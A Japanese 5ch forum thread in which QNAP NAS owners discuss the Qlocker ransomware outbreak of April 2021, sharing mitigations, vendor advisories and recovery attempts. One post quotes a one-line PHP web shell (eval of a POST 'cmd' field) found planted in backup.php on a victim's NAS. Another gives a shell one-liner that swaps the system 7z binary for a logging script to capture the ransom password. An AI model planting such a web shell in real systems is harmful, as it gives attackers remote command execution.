【静音・高機能NAS】QNAP part56【自宅サーバ】

■ このスレッドは過去ログ倉庫に格納されています
2021/04/22(木) 15:58:45.35ID:gJ+wWukAr
※次スレは>>970踏んだ方が立てて下さい。立てる時は1行目に !extend:checked:vvvvv:1000:512 をお忘れなく。

静音・高速・高性能なNASサーバ、QNAPのアプライアンス製品のスレ
NASを使う際に気になる点、速度・機能・静音などを高いレベルで満たす数少ない製品です
NASは初めての方から、標準搭載の各種機能が目的の方、データ保全とセキュリティが重要な業務用途、
Linuxベースの自宅サーバが欲しい方まで、幅広いユーザに最適です
QNAPは台湾のメーカーですが、マニュアルからユーティリティまで完全日本語対応です

・オフィシャルサイト: https://www.qnap.com/ja-jp/
QNAP NAS Community Forum https://forum.qnap.com/
保証情報 https://www.qnap.com/ja-jp/service_ask/
販売/流通ルートは(海外通販や並行輸入品なども含めて)幾つもあります
正規代理店も複数あるので、故障時の手間や保証サポートのことも考えて、好きな流通経路のものを

関連サイト
・QNAP Club Japan https://www.qnapclub.jp/

関連スレ
NAS総合スレPart31 (LAN接続HDD)
https://mevius.5ch.net/test/read.cgi/hard/1566794151/

前スレ・過去スレ:【静音・高機能NAS】
part49 https://mevius.5ch.net/test/read.cgi/hard/1569008532/
part50 https://mevius.5ch.net/test/read.cgi/hard/1577438170/
part51
https://mevius.5ch.net/test/read.cgi/hard/1583806285/
part52
https://mevius.5ch.net/test/read.cgi/hard/1591197765/
part53
https://mevius.5ch.net/test/read.cgi/hard/1597666162/
【静音・高機能NAS】QNAP part54【自宅サーバ】
https://mevius.5ch.net/test/read.cgi/hard/1607608227/
【静音・高機能NAS】QNAP part55【自宅サーバ】
https://mevius.5ch.net/test/read.cgi/hard/1615087933/
VIPQ2_EXTDAT: checked:vvvvv:1000:512:: EXT was configured
2021/04/22(木) 21:01:30.47ID:A5+TDFlc0
前スレでadmin試行でうぎゃー、無効化したけど副作用がーとかさんざんやったから
皆さんadminは無効化済みだと思ってたんだけどそうでもないのかな
2021/04/22(木) 21:02:20.34ID:vwfBrxkg0
身代金の支払いは流行りのBitcoin送金?
2021/04/22(木) 21:05:51.75ID:A5+TDFlc0
>>8
現在進行形でプロセスが仕事中なら
psコマンド叩けば7zのパスワードが見えるのかも
2021/04/22(木) 21:08:24.06ID:+fzrol8Y0
>>11
正解はこれだと思うわ。
2021/04/22(木) 21:16:33.30ID:EijXdzw50
453dでメモリ増設する予定ですが、16もあれば十分でしょうか?
仮想マシンとかも使う予定なのですが32あったほうがいいですか?
2021/04/22(木) 21:16:39.83ID:CK1QfIRR0
>>7
myqnapcloudは直接の問題じゃないよ

admin無効化
デフォルトポートの変更
ポートスキャンのブロック
ルータFWでWAN着信の地域限定化
UPnPはNAT FW連携の停止(NAT設定は平気)
2021/04/22(木) 21:19:21.25ID:CK1QfIRR0
>>13
x53DはCPUの制限でMAX8GB
16GBはモジュール次第で認識するけど不安定になる事もある
両面チップのモジュールが認識しやすい
32GBは基本無理
2021/04/22(木) 21:23:25.91ID:vnd5ptjM0
>>8
暗号化には /usr/local/sbin/7z を使っているので
7zをパスワードを記録するようなコマンドに書き換えるとよい
psコマンドではパスワードは表示されないらしい

https://forum.qnap.com/viewtopic.php?f=45&;t=160849&start=75#p786971
2021/04/22(木) 21:31:25.38ID:RUJvEK3m0
ようやっとTS-253D上のVM(Windows10)でPT3が使えた
pcieパススルー設定後はVMの再起動じゃPT3認識しなくて
VMシャットダウン→VM起動しないとダメだとわかるまで時間がかかったわ
2021/04/22(木) 21:32:36.53ID:6ELQ5VCK0
32GBいけるんじゃない?
https://blog.tomoya.dev/posts/my-first-impression-of-nas/
https://gadgetrip.jp/2020/07/review_qnap_ts253d_advanced/
2021/04/22(木) 21:37:31.64ID:A5+TDFlc0
>>16
psで見えないのか…ってこれいいね
偽7zに置き換えて食わされた引数をファイルに書くの
2021/04/22(木) 21:41:00.45ID:XdoGEJMy0
ド素人で申し訳ないんだけど、そのランサムウェアはワンタイムパスワード使っててもダメなのか?
2021/04/22(木) 21:42:41.13ID:46ROtieb0
すまない。
焦って再起動してQTS更新しちまった

終わってから調べたら7zファイルは約200個見つかった。
全部20MB以下。
このNASに保管しているすべての20MB以下ファイルが漏れなく7zになってるので
見事にやられた状態。

タイムスタンプ見ると2個増えたんじゃなくて
自部の探し方が悪くて後から見つかっただけっぽい。
200個のファイルのタイムスタンプは1分も差がなかった。
気が付いた時には手遅れだったみたい。

外部との共有用でファイル自体は別の場所にもあるので被害は無いが
やっぱり悔しいな
2021/04/22(木) 21:43:50.48ID:OyHYs1RP0
まだ原因は分かってない感じ?
2021/04/22(木) 21:53:24.57ID:prhlyD260
やられた…
今気づいて検索してここまで来たよ…
一旦電源落とした
2021/04/22(木) 21:58:47.59ID:vnd5ptjM0
フォーラムをいくつか見てるけど、これという原因は特定されていないんだよね
未知の脆弱性や既存の脆弱性を一斉に狙ってるのかも

>>19
書き出したファイルを暗号化されたら駄目だけどねw
loggerで書き出してもいいかも
2021/04/22(木) 22:02:19.17ID:B8zjs0qa0
これ電源落としたほうがいいの?
もう結構やられちゃったけど……
admin無効化したら大丈夫かな?
2021/04/22(木) 22:04:20.34ID:UUQeUHZr0
なんの防御策も行わず外部公開にしてる抜けてる人多いんだなぁ。
2021/04/22(木) 22:12:52.57ID:+fzrol8Y0
被害に遭った人は落ち着いたら構成を教えてほしい。
2021/04/22(木) 22:13:00.25ID:vnd5ptjM0
Response to Qlocker Ransomware Attacks: Take Actions to Secure QNAP NAS
https://www.qnap.com/nl-nl/news/2021/response-to-qlocker-ransomware-attacks-take-actions-to-secure-qnap-nas
2021/04/22(木) 22:13:48.96ID:vnd5ptjM0
>>25
電源はすぐに落とす、救える可能性がある
2021/04/22(木) 22:19:40.24ID:vnd5ptjM0
>>29
と思ったら落とさない方がいいのか?
31不明なデバイスさん (ワッチョイ d752-TCu/)
垢版 |
2021/04/22(木) 22:37:05.47ID:Lb8KwnwH0
かなりの騒ぎになってますね。
自分も今から7z化されてないか確認します、、
2021/04/22(木) 22:41:15.16ID:+fzrol8Y0
>>19
のパターンも考えると中途半端に電源落とすの考えもの。
ひょっとしたらkeyが分かるかも。ミスると被害は拡大するかもしれんが。
2021/04/22(木) 22:47:02.93ID:B8zjs0qa0
>>32
逆に落とすの止めました もう重要なファイルが7zipになっちゃってるから逆に関係ない…
keyが分かればいいんですけどね…
2021/04/22(木) 22:51:20.76ID:B8zjs0qa0
>>16のこれって
cd /usr/local/sbin; printf '#!/bin/sh \necho $@\necho $@>>/mnt/HDA_ROOT/7z.log\nsleep 60000' > 7z.sh; chmod +x 7z.sh; mv 7z 7z.bak; mv 7z.sh 7z;

7zip化が進んでる状態じゃないと意味がないのかな?
もうadmin無効化とかQNAPcloud無効化で止まったっぽいんだけど、それだとパスワード解析することは出来ない?
2021/04/22(木) 22:57:19.94ID:IPONL9MI0
>>18
認識もするし動くことは動くが、運用中不可解なエラーがでるよ。ストレージエラーでRAID再構築が始まったりとか。海外フォーラムでもわりかし定番。

基本はCPUの上限でやめといた方が吉。
サポートも純正メモリ以外は純正メモリに換装後に問題あるならサポートするよってスタンス

ブログとかの奴らは認識して使えてる風な事を書くがろくに使ってないから問題が出ない。そんなならそもそもそこまでいらんやろ。
36不明なデバイスさん (ワッチョイ 1701-4rDj)
垢版 |
2021/04/22(木) 22:58:33.86ID:nhbrpuoI0
PHPの脆弱性が狙われたんだと、PHPの公式サイトがハッキング被害に遇ったのと
関係してるかもしれんね。

PHPの公式Gitサーバーにハッキング被害--バックドアを仕掛けるコードが見つかる
japan.cnet.com/article/35168549/

ハッカーがPHPの開発者になりすましてソースコードにバックドアを仕込んでいたことが判
gigazine.net/news/20210330-phps-git-server-hacked-backdoors/
2021/04/22(木) 23:12:50.72ID:prhlyD260
Multimedia直下のVideoPictureMusicが暗号化されてて
Multimedia直下の他のフォルダとかPublicフォルダとかは無事だった
優先してやったりしてるんだろうか
2021/04/22(木) 23:22:39.89ID:A5+TDFlc0
> $ ps --help
(snip)
> This version of ps accepts no options.
(´;ω;`)

いつも ps ax | grep foo 程度の使用で気づいてなかった真実をいま学んだ
後ろが切れる状態から変えようがないんだったらそら見えないか
というかずっと無意味にオプションつけてたよ…
2021/04/22(木) 23:32:34.24ID:A5+TDFlc0
>>2の上の記事

Update 4/22/21: A bug was discovered last night that allowed victims
to recover their 7zip password for free
but was fixed soon after being discovered. More info in update below.

えええ…
2021/04/22(木) 23:53:38.99ID:gJiVTxzI0
先月malware removerがマルウェア発見して、たまたま機種変更しようと思ってたところだったからすぐ機種変更して、セキュリティ関連も見直ししたんだけど、あの時ほったらかしてたら確実にやられてたな…
2021/04/22(木) 23:57:11.11ID:B8zjs0qa0
>>39
これ、解決方法あるよーって言ってたやつ?解決できなかったのか…
QNAP公式はなんにもアナウンスしてないの
2021/04/23(金) 00:05:04.62ID:HVNi+ZMd0
写真とmp3、自炊データが被害に……
大部分が容量大きめで↑以外殆ど被害がなかったのが救い
とりあえずupnpと二段階認証とCloudとadminの無効化・確認してきた
2021/04/23(金) 00:14:15.92ID:iCRSyXOg0
>>41
解決手段(穴)がふさがれてしまった、という感じだと思っていただければ
公式のアナウンスは今のところ>>28に載せてくれてるリンク
2021/04/23(金) 00:20:54.34ID:NH2AZhR/0
スナップショットがランサムウェアによって削除されてるしどうすればいいんだ
2021/04/23(金) 00:25:43.98ID:wIzXa8Byr
>>35
x53Dでやれる範囲のVMだったら8GBで十分だしな
篠と違ってメモリ大量に積んでもあんまりキャッシュ効果もないし
2021/04/23(金) 00:33:39.70ID:ZYMa9gv40
winで/mnt/HDA_ROOTにアクセスするにはどうすればいいの?
SSHでファイル移動する以外にGUIでは見れない?
2021/04/23(金) 00:35:55.96ID:iCRSyXOg0
アナウンスから
> QNAP has released an updated version of Malware Remover for operating systems
> such as QTS and QuTS hero to address the ransomware attack.
> If user data is encrypted or being encrypted, the NAS must not be shut down.
> Users should run a malware scan with the latest Malware Remover version immediately,
> and then contact QNAP Technical Support at https://service.qnap.com/.

(雑すぎる和訳)
ランサム対策で Malware Remover を新しくしたんよ
もし暗号化済み・暗号化中だったらNASをシャットダウンしちゃダメ
すぐに最新版の Malware Remover でスキャン、んでからサポートに連絡してね
2021/04/23(金) 00:37:20.75ID:Gx4/OGZO0
>>44
スナップショットはどんな状態になるの?
2021/04/23(金) 00:39:42.92ID:gJPKi2eM0
もう電源落としちゃったよ…
2021/04/23(金) 00:44:57.97ID:gpybkIlc0
セキュリティ対策は>>14

ルータがセキュアな製品じゃない人はこの機会に買い替えましょう
IPS/IDSついてるASUSかSynologyがオススメ
BUFFALOとか日本製はとにかくゴミ
2021/04/23(金) 00:48:21.84ID:NsvKeBB/0
先週初NAS購入したのにいきなりコレかよ…
2021/04/23(金) 00:52:03.09ID:ZYMa9gv40
誰か/mnt/HDA_ROOT/以下の見方教えて…
共有フォルダはそれ以下の
外してlinuxでマウントしようにも電源落とせないから外せない
2021/04/23(金) 00:52:31.73ID:ZYMa9gv40
2行目抜けてた
SMBだと共有フォルダ以下しか見れないよね?
2021/04/23(金) 01:00:51.63ID:ame0MMOB0
>>45
VMなんか今どき使わない。
うちは16GBでDockerコンテナ起動しまくってそこそこ負荷かけてるけど、安定して稼働してるよ。
2021/04/23(金) 01:05:39.08ID:f9jkfur/0
998 名前:不明なデバイスさん (ブーイモ MM9b-9WMT) [sage] :2021/04/22(木) 20:43:55.74 ID:1yFbfocbM
何のウイルスのときか忘れたけどプロセス止めたり再起動するっていう対応が不正解というとんでもないパターンもあったよな。
プロセスが生きてる場合に限りワクチン起動するとメモリから複合鍵を生成できるみたいな。
ほっとくとモリモリ暗号化が進んでくかもしれないし無責任なアドバイスはできないけど。判断むずかしいな。

人の言うことは聞いてみるもんだな。
2021/04/23(金) 01:06:30.07ID:X08T9SNG0
アドミン無効化してないやついるってことか?まじか?
2021/04/23(金) 01:08:25.83ID:wIzXa8Byr
>>54
どんなことしてる?
PT3パススルーで録画マシン組んだり尼フォト動かしたり出来るならVMなんか使わないが
2021/04/23(金) 01:09:49.63ID:CkMu9Kn80
どうすればいいん?
とりあえず外にはつながってないから放置でもOK?
$ echo 'とけばわかる' | md5sum
8af456005f50587ac913f76ae00eda93 -
2021/04/23(金) 01:10:40.41ID:CkMu9Kn80
$ echo -n '解けばわかる' | md5sum
14980c8b8a96fd9e279796a61cf82c9c -
改行…
2021/04/23(金) 01:11:03.67ID:NsvKeBB/0
知識もないのに調子に乗って購入したらこのザマですよ
2021/04/23(金) 01:11:44.10ID:wIzXa8Byr
>>56
脆弱性のクラックだからadmin云々は関係ないっしょ
パス破ったりむりやり昇位して乗っ取ったわけじゃないんだから
2021/04/23(金) 01:13:17.05ID:CkMu9Kn80
まあ流石に外からつながらなけりゃ大丈夫かな…
続報をまとうず
2021/04/23(金) 01:16:18.15ID:NH2AZhR/0
なんかシャットダウンやら再起動したらアウトな空気だよな
シャットダウンしちまったよ
2021/04/23(金) 01:17:07.37ID:gpybkIlc0
>>60
キチンとセキュリティ対策してた人は長期ユーザでも限られた一部だから気にするなよ
ご愁傷さまです
2021/04/23(金) 01:21:52.31ID:KTx093qa0
クローンやフルバックアップも取ってない時点でNASユーザーとしては失格の部類だろ
NASはテンポラリであって保管場所じゃない
2021/04/23(金) 01:22:24.60ID:IZmgFo7s0
NASがバックアップ手段のうちの一つでしかないんでいくらでも攻撃してくれって感じ

やられたことないけど(´ω`)
2021/04/23(金) 01:26:08.58ID:gJPKi2eM0
ファームウェア更新とシャットダウンやってしまったけど
再起動後もガリガリHDD動いてるっぽいんだけど
まだ暗号化走ってるのかな
2021/04/23(金) 01:26:10.30ID:Gx4/OGZO0
シャットダウンすればそれ以上暗号化される心配はないけど
動作中であれば>>16でパスワードがわかる
再起動したら暗号化が再び始まったという話もあるので判断が難しい

とりあえずforumの最新情報を見て判断するしか、消された元ファイルを復活させるとか
https://www.bleepingcomputer.com/forums/t/749247/qlocker-qnap-nas-ransomware-encrypting-with-extension-7z/
https://forum.qnap.com/viewtopic.php?f=45&;t=160849&sid=8223b1531d52b41ffcd0f23b148495e8
2021/04/23(金) 01:37:25.90ID:f9jkfur/0
最大のセキュリティ対策はやはり冗長化だな。
即FW適用は不具合を拾って死ぬリスクもあるし。
ディスクのロットをバラして筐体冗長はメーカーもバラしたいところ。
あと個人ユースでの倉庫レベルならスナップショットよりも日単位か週単位くらいに世代ずらしてバックアップするほうが良いわ。
元ファイルはデジカメのSDなりPCのローカルなりに1週間分くらい置いておけば良いわけで。
更にいうと月1で外付けHDDにも逃すくらいのことすると落雷サージとかまで考えたらなお良いけどズボラな性格の自分には絶対に無理だわ。
あとはAWSのglacierくらいか。
2021/04/23(金) 01:44:27.06ID:CkMu9Kn80
よしもう1台買う決心がついた
問題はHDDがどこにも売ってないことなんだよなあ…
2021/04/23(金) 01:48:30.09ID:ZYMa9gv40
フォーラム見てたんだけどこれってどういう事か分かる人いる?

You might be a lucky exception. My files are encrypted. Check on one file with

/usr/local/sbin/7z.bak l -slt FILENMAE.7z
local/sbin/7z.bak l -slt FILENMAE.7z
2021/04/23(金) 01:59:28.88ID:4bxuXQsT0
やっぱりスナップショットはランサムウェア対策にはならんのだな
そりゃそうだ
QNAP公式サイトでさんざんランサムウェアにはスナップショットを連呼してたから騙されるところだった
2021/04/23(金) 06:06:08.72ID:9URsxrwh0
朝起きたらマルウエアリムーバーがエラーで開かないんだけどみんなは大丈夫?
2021/04/23(金) 06:59:45.59ID:9URsxrwh0
アプリ再起動したらいけた模様。
スレ汚し申し訳ない
2021/04/23(金) 07:18:42.94ID:uXnE/iYQ0
adminの無効化はどうなんだろうな。
簡単なパスワードを設定しなければ関係ない気がする。脆弱性を突かれる場合は関係ないだろうし。
2021/04/23(金) 07:31:12.03ID:yU4qozcNM
IDがわかりづらいだけでも無効化の価値はあるかと
2021/04/23(金) 07:42:36.54ID:gP3DPAa2M
資格情報はファームにハードコーディングされたパスワードでログインしてるって言う
情報があったんで、もしそうだとするとadminを無効化するのは意味ないね
どうしてそんな仕込みをしてあるのかは不明だけど
2021/04/23(金) 08:00:32.86ID:f9jkfur/0
スナップショットは十分な容量がある上でやられたのがPC側なら意味はある。
NASがやられると意味なさそう。
2021/04/23(金) 08:10:07.17ID:q94oGlmY0
>>48
普通は出るファイル・フォルダがないことにされる。

>>77
ttps://www.qnap.com/en/security-advisory/QSA-21-13
これのことでしょ?多分これがアタリだと思う。
うちはポートも変えてたし、adminも無効にしてたけどやられた。
皮肉にもHBS 3 Hybrid Backup Syncで外部ディスクにバックアップ取ってたおかげでファイル復旧は出来たけど。
80不明なデバイスさん (ワッチョイ 3f2d-H1Bl)
垢版 |
2021/04/23(金) 08:45:19.26ID:SIjBCSGD0
degrade modeってなんだよ
動作がとてつもなく遅い やられたのか
2021/04/23(金) 08:51:29.91ID:nxvWd4SbH
>>80
sshで入ってps auxでもしてみ
変なプロセスが多すぎるとか
2021/04/23(金) 09:13:04.01ID:g1UiajzG0
>>79
双子の脆弱性って解説があるみたいやぞ。

ttps://www.vortez.net/news_story/qnap_nas_users_advised_to_urgently_update_malware_remover_due_to_ransomware.html

> More details on the vulnerabilities exploited can be found at QNAP security advisories
> QSA-21-11 (https://qnap.to/3eq7hy) and QSA-21-13 (https://qnap.to/3dygse).

無線ルーターを最近出たQNAPのQHora-301Wに交換して、QNAPのNASを導入しよう
かと思ってたけど、どちらもまだ導入してなくてよかった。
2021/04/23(金) 09:16:56.86ID:uXnE/iYQ0
しかし、疑問なのは、どうやってWAN側からNASまで辿り着いたのか、だよね。この脆弱性を利用するにせよ、NASにはアクセスしないといかんわけで。
2021/04/23(金) 09:19:54.88ID:bICER9Vj0
今回のランサムウェアのいま出てる情報を総括して考えると

・UPnPの脆弱性とHBC3にハードコードされたパスワードを利用して侵入している可能性
・ある容量以下のファイルを全て7zに暗号化する
・解凍パスワードは32桁なので総当り解読は無意味
・プロセスが動作中であればパスワードを抜き出せる可能性あり

こんな感じかな?
2021/04/23(金) 09:22:54.67ID:uuqRoYoZM
>>79
ポート変えてたってのが気になる。
HTTPとか開けてたの?
2021/04/23(金) 10:06:00.17ID:q94oGlmY0
>>82
マルチメディア〜はうちの環境だと当てはまらない(使ってないしインストールしていない。QTSは3月2日のアップデートが最新)ので、HBS3のハードコートパスの方が拙いと思ってる。

>>85
使おうが使うまいがポート変えるのは基本でしょ?
それはともかくmyqnapcloudで外向きに出してる。
外部公開していない人で当たった人は居ないのでは?

うちの環境から察するに、myqnapcloudでターゲティング(一寸前にadminに対してもの凄い総当たり攻撃があったのはmyqnapcloudでターゲティングしたんだと思ってる)、
HBS3のハードコートパスワードで侵入したんだと思う。
2021/04/23(金) 10:17:14.84ID:KdMFhYnHH
admin無効 関係なし
ポート変更 関係なし

現状できる回避策はUPnPのオフとNASをネットワークから隔離することくらい
2021/04/23(金) 10:20:59.68ID:ZLjYCYnu0
あああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああ

金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ
2021/04/23(金) 10:31:26.42ID:uuqRoYoZM
>>86
ありがとう。
myqnapcloudで当たりをつけてupnpで侵入って感じか。
それだとmy〜を使ってない人はほぼセーフってところか。
2021/04/23(金) 10:52:23.53ID:oUNsi+RB0
新機種買ったので現有機器をローカル限定に切り替えたところだった。
ギリギリセーフw
2021/04/23(金) 10:58:48.59ID:NK8iVUJW0
流れと関係ないけどTS-231Pを4.5.2 Build 20210406に上げたらWebDAVに繋がらなくなった
2021/04/23(金) 11:00:05.25ID:bICER9Vj0
とりあえず今回のランサムウェア緊急回避対策

・最新のHBS3に更新
・QNAPの外向きサービスとの紐付け解除
・UPnP停止
・最新のMalware Removerをインストール

出来るならネットワークから切り離してスタンドアロン環境で様子見もあり
2021/04/23(金) 11:01:31.16ID:gJPKi2eM0
7zのパス出させる方法は手遅れだったので
小さいファイルを32桁開始で総当たりする解析スクリプト回し始めた
たぶん無理
2021/04/23(金) 11:48:07.81ID:V/HJjc+pM
うちので外とやり取りあるのはこれだけ。
DDNS noipで更新
NTP nict
L2TP
インバウンドはNAS以外を含めてもL2TPしか通してない。
それ以外はブロードバンドルータで止めてる。
myQNAPはアカウント自体を作ってない。
これなら大丈夫だよな?
昨晩確認した限りではルータにはアメリカとかチェコから1時間に数件のpingがあった程度。
NASにはadminとL2TP用のユーザでのログインログしかなかった。
2021/04/23(金) 12:03:43.99ID:Gx4/OGZO0
/usr/local/sbin/7z がシェルスクリプトに変更されている
2021/04/23(金) 12:13:38.26ID:Gx4/OGZO0
>>95
デフォルトだと /share/CACHEDEV1_DATA/.qpkg/MalwareRemover/7z.log に
7zのパスワードを保存するようだ、ご注意を
2021/04/23(金) 12:21:27.70ID:Gx4/OGZO0
攻撃を受けた人って

/root/re.sh
/mnt/ext/opt/apps/backup.php

のファイルがある?
2021/04/23(金) 12:26:36.04ID:SBUfgyfH0
なにがショックってスナップショットが全く役に立たなかったってこと
意味ないじゃん・・・
2021/04/23(金) 12:27:07.46ID:iCRSyXOg0
>>96
95を見て「それは>>16をやったからでは?」と思ったら16さんだった件

最新のMalware Removerを走らせたらそうなった、とかでもないのかな
7zが書き換えられてログ取るようにされた!QNAPに!的な
2021/04/23(金) 12:48:42.09ID:Gx4/OGZO0
>>99
/usr/local/sbin/7zの更新日付がMalware Removerが動いた時間なので多分そうではないかと
2021/04/23(金) 13:04:22.83ID:q94oGlmY0
>>89
upnpはどうなんだろう?本質的にはHBS3に入ってた認証情報が使われた可能性が結構あるというところまでな気がする。
いや疑わしきは罰すの精神でupnp無効はアリと思うけど。

>>92
Malware Remover入れて回したら、「見つかって除去したわ。再起動して」って出るけど、公式は再起動するなと言ってる罠
https://www.qnap.com/ja-jp/news/2021

>>94
今回の件とは別件だけど、adminに対して1日で1000件以上(途中から数えるのを止めた)のブルートフォース攻撃が起こったりしてるから、可能性は低いにしても外向きに構えるならadminは無効にしないと。

>>97
/mnt/ext/opt/apps/backup.phpだけあって、中身は「<?php eval($_POST["cmd"]);?>」のみだったけど、何かあるの?

>>98
スナップショットが消されてこの世の絶望を味わったけど、皮肉にもHBS3のおかげで外付けディスクにバックアップが取れてて地獄と天国を見て、
多重バックアップは必須というのを思い知ったわ。
2021/04/23(金) 13:09:45.78ID:bD92dHctM
帰ったら俺もNAS確認しよ、月曜日にはHBS3がUSBHDDを上書きしちゃう!
2021/04/23(金) 13:17:18.52ID:iCRSyXOg0
>>100
「海外フォーラムチェックしながら心配してくれてる人が、やられた?」と
動揺して勝手に16さんだと決め付けてごめんなさい

QNAPの仕業っぽかったら問題なしですね。ログの置き場も置き場だし
2021/04/23(金) 13:56:37.50ID:/H/TJXmxM
>>79
>>64のファイルがスナップショット無効化とphpのエクスプロイトらしい
2021/04/23(金) 13:57:47.85ID:Fypb96zdM
>>101
ありがとう。
念のため片方はadmin外してgoogle認証アプリの2要素までセットしたわ。
2021/04/23(金) 13:58:07.13ID:jEDYAQ4DM
ポート開放、adminの無効化、2要素認証、ポート変更は関係なく、myQNAPcloud経由でアクセスを許可してる人が侵入されるのかな?
myQNAPcloudは繋ぎ方が複数あって、UPnPとnasからqnapに繋ぎに行くcloudlinkとがある。
2021/04/23(金) 14:08:16.64ID:gJPKi2eM0
これQNAPどう落とし前つけるの?
修正バージョン配ってロックかかった人は残念だったねで終わり?
2021/04/23(金) 14:26:39.45ID:jUDl+BTHD
>>107
ゼロデイだろうからそうじゃないの?
■ このスレッドは過去ログ倉庫に格納されています
5ちゃんねるの広告が気に入らない場合は、こちらをクリックしてください。
ニューススポーツなんでも実況